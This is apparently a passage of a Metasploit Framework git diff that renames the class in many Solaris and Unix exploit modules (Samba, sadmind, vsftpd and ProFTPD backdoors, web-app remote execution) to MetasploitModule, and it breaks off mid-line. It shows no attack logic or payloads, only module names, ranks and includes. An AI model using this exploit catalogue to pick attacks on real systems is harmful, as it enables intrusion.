a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 4445b77033..09b25d9077 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 926c665dce..3623fcbd90 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 0a6caf1ee7..9ebc7d42e6 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 5326f8d851..3557828c07 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 184c225c90..5053c21189 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index bafae78d1e..5fde51c927 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 36c43eb15d..6672291ed6 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb index e3e6f56fad..ee3447c380 100644 --- a/modules/exploits/unix/dhcp/bash_environment.rb +++ b/modules/exploits/unix/dhcp/bash_environment.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DHCPServer diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index 71a4fd8416..588bab550e 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index 0e39c322d6..8fabe4bf78 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index ce6388be3e..49de9d25e1 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index b5a5b70f1f..91eccda718 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/ctek_skyrouter.rb b/modules/exploits/unix/http/ctek_skyrouter.rb index ff6c6bb7a9..746a77a401 100644 --- a/modules/exploits/unix/http/ctek_skyrouter.rb +++ b/modules/exploits/unix/http/ctek_skyrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb index cb85ffd2a2..2c1e3a00a7 100644 --- a/modules/exploits/unix/http/freepbx_callmenum.rb +++ b/modules/exploits/unix/http/freepbx_callmenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 8a06f2b6b2..f149a66c21 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/twiki_debug_plugins.rb b/modules/exploits/unix/http/twiki_debug_plugins.rb index 53f4b48af4..78c51d98f0 100644 --- a/modules/exploits/unix/http/twiki_debug_plugins.rb +++ b/modules/exploits/unix/http/twiki_debug_plugins.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb index 1b2de6b94b..3765e1585b 100644 --- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb +++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index c9a00bc53e..49205040b0 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/local/chkrootkit.rb b/modules/exploits/unix/local/chkrootkit.rb index 1c7b5c64a6..fc495385bd 100644 --- a/modules/exploits/unix/local/chkrootkit.rb +++ b/modules/exploits/unix/local/chkrootkit.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb index db1aeb5ba1..fb4c775800 100644 --- a/modules/exploits/unix/local/setuid_nmap.rb +++ b/modules/exploits/unix/local/setuid_nmap.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index 6a4c335ca5..c46bbf9295 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb index 9bdeb95f3d..e86a518727 100644 --- a/modules/exploits/unix/misc/qnx_qconn_exec.rb +++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 1445b92a9c..5b52c215f9 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb index 64b8255efb..5f5c297d71 100644 --- a/modules/exploits/unix/misc/xerox_mfp.rb +++ b/modules/exploits/unix/misc/xerox_mfp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index 7498d4486e..f197f52cf8 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index c504ba9392..e2bcac05b5 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index a985514797..429deb28bf 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 02376c7c19..3ba50240b7 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 5c1510028b..1ab9cd26f4 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index 99d0bc71fd..3700edc024 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index c97f321c9a..2d27a36799 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index bc273029c4..c047d659b8 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 516bac7a51..b91d673eb6 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index de4f73f6b2..12a82d861e 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index ce3cf84b4a..d334336979 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index 574db617bd..48882338b7 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/basilic_diff_exec.rb b/modules/exploits/unix/webapp/basilic_diff_exec.rb index 3dcef095f8..748c447481 100644 --- a/modules/exploits/unix/webapp/basilic_diff_exec.rb +++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 66ab5cdf4e..a91d30bcad 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb index 045be447c2..247850e4b8 100644 --- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb +++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb index 66e4aed547..108a21e443 100644 --- a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb +++ b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb index 0e8aad113d..30434c954c 100644 --- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb +++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 2c98d91f63..538cc64d7a 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 948a9108db..4d589b50b6 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index d39e728937..603c96f61f 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 7ae0f83833..cd39139bb4 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index 8b24944c6f..bbbfdab839 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index 6324068bf5..ed1b03f3f3 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 0cb8ac52d9..297c2c987f 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index f530c09ab0..ce9fec4a64 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index 2ae8d9d41a..d5969f2945 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ b/modules/exploits/unix/webapp/generic_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index 5d3afc9353..110a0ca5ec 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index bc505ad66f..97d0e53509 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/unix/webapp/graphite_pickle_exec.rb b/modules/exploits/unix/webapp/graphite_pickle_exec.rb index 29ebbb1775..9cd39b23bd 100644 --- a/modules/exploits/unix/webapp/graphite_pickle_exec.rb +++ b/modules/exploits/unix/webapp/graphite_pickle_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 53b9e6911c..3be8d20512 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index 8840dc855c..1d3a6013ee 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index f76388a42d..f74529955c 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb index ecfd1ac294..cb51feb8a5 100644 --- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb index 6b495eed60..1932c444a3 100644 --- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # application config.php is overwritten include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/instantcms_exec.rb b/modules/exploits/unix/webapp/instantcms_exec.rb index 0fb2359c31..593e52d53b 100644 --- a/modules/exploits/unix/webapp/instantcms_exec.rb +++ b/modules/exploits/unix/webapp/instantcms_exec.rb @@ -1,7 +1,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index e2b2f8b485..c684cd70a8 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index 7836c4732d..7fd532a986 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index af1204f917..f36e78b209 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < 